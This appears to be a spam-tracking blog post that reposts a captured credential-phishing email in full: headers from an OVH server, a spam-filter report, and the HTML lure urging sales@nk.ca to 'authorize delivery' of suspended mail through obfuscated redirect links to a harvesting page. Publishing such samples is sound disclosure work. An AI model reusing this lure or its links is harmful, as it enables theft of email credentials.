ovh credential phishing

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 21 Dec 2023 16:36:13 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.97 (FreeBSD))

(envelope-from )

id 1rGSO8-00000000Anv-2m23

for dave@doctor.nl2k.ab.ca;

Thu, 21 Dec 2023 16:23:36 -0700

Resent-From: The Doctor

Resent-Date: Thu, 21 Dec 2023 16:23:36 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from vps-72fa32de.vps.ovh.us ([15.204.8.197]:34908)

by doctor.nl2k.ab.ca with esmtp (Exim 4.97 (FreeBSD))

(envelope-from )

id 1rGPC0-00000000LxU-20PN

for sales@nk.ca;

Thu, 21 Dec 2023 12:58:56 -0700

Received: from secure.net (localhost [IPv6:::1])

by vps-72fa32de.vps.ovh.us (Postfix) with ESMTP id CFB204EF58C

for ; Thu, 21 Dec 2023 19:37:57 +0000 (UTC)

From: "sales@nk.ca"

To: sales@nk.ca

Subject: You have (3) Suspended incoming messages

Date: 21 Dec 2023 11:37:57 -0800

Message-ID: <20231221113757.02A430DBF1157F12@secure.net>

MIME-Version: 1.0

Content-Type: text/html;

charset="iso-8859-1"

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 15.0

X-Spam_score_int: 150

X-Spam_bar: +++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: From nk.ca Server You have (3) messages pending on your email

storage server as at 12/21/2023 11:37:57 a.m. User ID: sales@nk.ca



Content analysis details: (15.0 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL blocklist

[URI: jrrnmpelmi.ii1l.autos]

[URI: pub-733b6001799640539b97952d6392594f.r2.dev]

1.9 URIBL_JP_SURBL Contains an URL listed in the JP SURBL blocklist

[URI: ii1l.autos]

1.3 URI_HEX URI: URI hostname has long hexadecimal sequence

1.5 HTTP_EXCESSIVE_ESCAPES URI: Completely unnecessary %-escapes inside a

URL

0.0 T_KAM_HTML_FONT_INVALID BODY: Test for Invalidly Named or Formatted

Colors in HTML

0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to

background

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

-0.0 T_SCC_BODY_TEXT_LINE No description available.

0.4 NAME_EMAIL_DIFF Sender NAME is an unrelated email address

0.7 PDS_FROM_2_EMAILS From header has multiple different addresses

1.7 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)

2.4 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level

above 50%

[cf: 100]

0.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%

[cf: 100]

1.6 FSL_BULK_SIG Bulk signature with no Unsubscribe

Subject: {SPAM?} You have (3) Suspended incoming messages

X-Antivirus: AVG (VPS 231221-4, 12/21/2023), Inbound message

X-Antivirus-Status: Clean




w3.org/TR/html4/loose.dtd">










Tahoma, Helvetica, sans-serif, serif, EmojiFont; BORDER-RIGHT-WIDTH: 0px; =

WIDTH: 700px; VERTICAL-ALIGN: baseline; WHITE-SPACE: normal; BORDER-BOTTOM-=

WIDTH: 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLO=

R: rgb(0,0,0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; P=

ADDING-LEFT: 0px; ORPHANS: 2; WIDOWS: 2; MARGIN: 0px; LETTER-SPACING: norma=

l; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px;=20

TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=

; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-=

decoration-style: initial; text-decoration-color: initial; font-variant-num=

eric: inherit; font-variant-east-asian: inherit; font-stretch: inherit">


ONT-FAMILY: inherit; BORDER-RIGHT: rgb(211,211,211) 1px dotted; BORDER-COLL=

APSE: collapse; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; COLOR: rgb(51,5=

1,51); BORDER-LEFT: rgb(211,211,211) 1px dotted; font-stretch: inherit">








solid; WIDTH: 2px; BORDER-BOTTOM: rgb(0,0,0) 0px solid; COLOR: rgb(0,0,0);=

PADDING-BOTTOM: 5px; PADDING-TOP: 5px; PADDING-LEFT: 5px; BORDER-LEFT: rgb=

(0,0,0) 0px solid; PADDING-RIGHT: 5px; BACKGROUND-COLOR: rgb(2,151,64)">
NT size=3D1> 

solid; WIDTH: 665px; BORDER-BOTTOM: rgb(0,0,0) 0px solid; COLOR: rgb(0,0,0=

); PADDING-BOTTOM: 5px; PADDING-TOP: 5px; PADDING-LEFT: 5px; BORDER-LEFT: r=

gb(0,0,0) 0px solid; MARGIN: 0px; PADDING-RIGHT: 5px; BACKGROUND-COLOR: rgb=

(243,255,248)">


IDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: 0px; FONT-WEIGHT:=

bolder; COLOR: ; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px;=

MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; font-stretch: inhe=

rit">From nk.ca Server



Tahoma, Helvetica, sans-serif, serif, EmojiFont; BORDER-RIGHT-WIDTH: 0px; =

WIDTH: 700px; VERTICAL-ALIGN: baseline; WHITE-SPACE: normal; BORDER-BOTTOM-=

WIDTH: 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLO=

R: rgb(0,0,0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; P=

ADDING-LEFT: 0px; ORPHANS: 2; WIDOWS: 2; MARGIN: 0px; LETTER-SPACING: norma=

l; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px;=20

TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=

; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-=

decoration-style: initial; text-decoration-color: initial; font-variant-num=

eric: inherit; font-variant-east-asian: inherit; font-stretch: inherit">
>



Tahoma, Helvetica, sans-serif, serif, EmojiFont; BORDER-RIGHT-WIDTH: 0px; =

WIDTH: 700px; VERTICAL-ALIGN: baseline; WHITE-SPACE: normal; BORDER-BOTTOM-=

WIDTH: 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLO=

R: rgb(0,0,0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; P=

ADDING-LEFT: 0px; ORPHANS: 2; WIDOWS: 2; MARGIN: 0px; LETTER-SPACING: norma=

l; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px;=20

TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=

; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-=

decoration-style: initial; text-decoration-color: initial; font-variant-num=

eric: inherit; font-variant-east-asian: inherit; font-stretch: inherit">You=

have (3) messages pending on your email stora=

ge server as at 12/21/2023 11:37:57 a.m.



Tahoma, Helvetica, sans-serif, serif, EmojiFont; BORDER-RIGHT-WIDTH: 0px; =

WIDTH: 700px; VERTICAL-ALIGN: baseline; WHITE-SPACE: normal; BORDER-BOTTOM-=

WIDTH: 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLO=

R: rgb(0,0,0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; P=

ADDING-LEFT: 0px; ORPHANS: 2; WIDOWS: 2; MARGIN: 0px; LETTER-SPACING: norma=

l; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px;=20

TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=

; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-=

decoration-style: initial; text-decoration-color: initial; font-variant-num=

eric: inherit; font-variant-east-asian: inherit; font-stretch: inherit">
>



Tahoma, Helvetica, sans-serif, serif, EmojiFont; BORDER-RIGHT-WIDTH: 0px; =

WIDTH: 700px; VERTICAL-ALIGN: baseline; WHITE-SPACE: normal; BORDER-BOTTOM-=

WIDTH: 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLO=

R: rgb(0,0,0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; P=

ADDING-LEFT: 0px; ORPHANS: 2; WIDOWS: 2; MARGIN: 0px; LETTER-SPACING: norma=

l; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px;=20

TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=

; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-=

decoration-style: initial; text-decoration-color: initial; font-variant-num=

eric: inherit; font-variant-east-asian: inherit; font-stretch: inherit">


IDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: 0px; FONT-WEIGHT:=

bolder; COLOR: ; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px;=

MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; font-stretch: inhe=

rit"> User ID:  
sales@nk.ca

aria-hidden=3Dtrue>



sans-serif, serif, EmojiFont; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: bas=

eline; WHITE-SPACE: normal; BORDER-BOTTOM-WIDTH: 0px; WORD-SPACING: 0px; TE=

XT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(44,54,58); PADDING-BOTTOM:=

0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; ORPHANS: 2; =

WIDOWS: 2; MARGIN: 0px; LETTER-SPACING: normal; PADDING-RIGHT: 0px; BORDER-=

TOP-WIDTH: 0px; TEXT-INDENT: 0px;=20

font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-str=

oke-width: 0px; text-decoration-thickness: initial; text-decoration-style: =

initial; text-decoration-color: initial; font-variant-numeric: inherit; fon=

t-variant-east-asian: inherit; font-stretch: inherit">


    ING-LEFT: 30px; PADDING-RIGHT: 30px">




  1. : baseline; BACKGROUND: rgb(80,110,216); BORDER-BOTTOM-WIDTH: 0px; COLOR: r=

    gb(255,255,255); PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10p=

    x; MARGIN: 0px; PADDING-RIGHT: 10px; BORDER-TOP-WIDTH: 0px; text-decoration=

    -line: none" href=3D"https://pub-733b6001799640539b97952d6392594f.r2.dev/en=

    dofyearupdates.html?clientID=3Dsales@nk.ca" rel=3D"nofollow noopener norefe=

    rrer" target=3D_blank=20

    data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://api.viglink.=

    com/api/click?sbieexhdkuaphrpijkut%26out%3D%2568%2574%2574%2570%253Aehppfya=

    fzt%252E%2569%2569%2531%256C%252E%2561%2575%2574%256F%2573%252Fbrzpz/dh/YVc=

    1bWIwQmhZM1JwYjI1aVlXY3VZMjl0OmllcnFramJsZWg%3D%26key%3Dfd5de1d096b38be9fff=

    d6ddc1948df4f&source=3Dgmail&ust=3D1702039472695000&usg=3DAOvVa=

    w1oPHDOGW44s8_qJRU3r2CL">Authorize delivery of pending mails


    dden=3Dtrue>






  2. : baseline; BACKGROUND: rgb(212,0,0); BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(=

    255,255,255); PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; =

    MARGIN: 0px; PADDING-RIGHT: 10px; BORDER-TOP-WIDTH: 0px; text-decoration-li=

    ne: none" href=3D"https://pub-733b6001799640539b97952d6392594f.r2.dev/endof=

    yearupdates.html?clientID=3Dsales@nk.ca" rel=3D"nofollow noopener noreferre=

    r" target=3D_blank=20

    data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://api.viglink.=

    com/api/click?lanoygsbykdtvsfatkoe%26out%3D%2568%2574%2574%2570%253Azszvftx=

    nxg%252E%2569%2569%2531%256C%252E%2561%2575%2574%256F%2573%252Fucuyy/ht/YVc=

    1bWIwQmhZM1JwYjI1aVlXY3VZMjl0OmxqeXdlcHJiemQ%3D%26key%3Dfd5de1d096b38be9fff=

    d6ddc1948df4f&source=3Dgmail&ust=3D1702039472695000&usg=3DAOvVa=

    w0fVUgjcyqX9NJBmdMAVcTV">Report error to an IT Help Desk



erif, serif, EmojiFont; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; =

BORDER-BOTTOM-WIDTH: 0px; COLOR: ; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; P=

ADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; f=

ont-stretch: inherit">


Helvetica, sans-serif, serif, EmojiFont; BORDER-RIGHT-WIDTH: 0px; VERTICAL=

-ALIGN: baseline; BORDER-BOTTOM-WIDTH: 0px; COLOR: ; PADDING-BOTTOM: 0px; P=

ADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER=

-TOP-WIDTH: 0px; font-stretch: inherit">


i, serif, EmojiFont; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; BOR=

DER-BOTTOM-WIDTH: 0px; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; PADDING-TOP:=

0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH:=

0px; font-stretch: inherit">*You will receive pending emails after s=

uccessful login via email portal. We apologize for the inconvenience.
>







f, EmojiFont; BORDER-RIGHT-WIDTH: 0px; WIDTH: 700px; VERTICAL-ALIGN: baseli=

ne; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(44,54,58); PADDING-BOTTOM: 0px; PA=

DDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 30px 0px 0px; PADDING-RIGHT: 0px=

; BORDER-TOP-WIDTH: 0px; font-variant-numeric: inherit; font-variant-east-a=

sian: inherit; font-stretch: inherit">



ible; BORDER-RIGHT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; MIN-HEIGHT: 0px">




sans-serif, serif, EmojiFont; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: bas=

eline; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(131,130,130); PADDING-BOTTOM: 0=

px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 10px 0px 0px; LINE-HEIGHT:=

2; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; font-variant-numeric: inheri=

t; font-variant-east-asian: inherit; font-stretch: inherit">Messag=

e Encrypted by 
nk.ca


   © All Rights Reserved.  &=

nbsp;| If you do not wish to receive this message   



N: baseline; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(0,102,147); PADDING-BOTTO=

M: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0p=

x; BORDER-TOP-WIDTH: 0px; BACKGROUND-COLOR: transparent; text-decoration-li=

ne: none"=20

href=3D"https://api.viglink.com/api/click?qhrylgkmmjjgntphcjgz&out=3D%6=

8%74%74%70%3Ajrrnmpelmi%2E%69%69%31%6C%2E%61%75%74%6F%73%2Fmbolk/xj/YVc1bWI=

wQmhZM1JwYjI1aVlXY3VZMjl0Om12aXV0dHVkaHE=3D&key=3Dfd5de1d096b38be9fffd6=

ddc1948df4f" rel=3D"nofollow noopener noreferrer" target=3D_blank=20

data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://api.viglink.=

com/api/click?qhrylgkmmjjgntphcjgz%26out%3D%2568%2574%2574%2570%253Ajrrnmpe=

lmi%252E%2569%2569%2531%256C%252E%2561%2575%2574%256F%2573%252Fmbolk/xj/YVc=

1bWIwQmhZM1JwYjI1aVlXY3VZMjl0Om12aXV0dHVkaHE%3D%26key%3Dfd5de1d096b38be9fff=

d6ddc1948df4f&source=3Dgmail&ust=3D1702039472695000&usg=3DAOvVa=

w0Dtn3SjYfmmmaRsX7EzaAe">Unsubscribe.

ODY>

Trackbacks

Trackback specific URI for this entry

This link is not meant to be clicked. It contains the trackback URI for this entry. You can use this URI to send ping- & trackbacks from your own blog to this entry. To copy the link, right click and select "Copy Shortcut" in Internet Explorer or "Copy Link Location" in Mozilla.

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA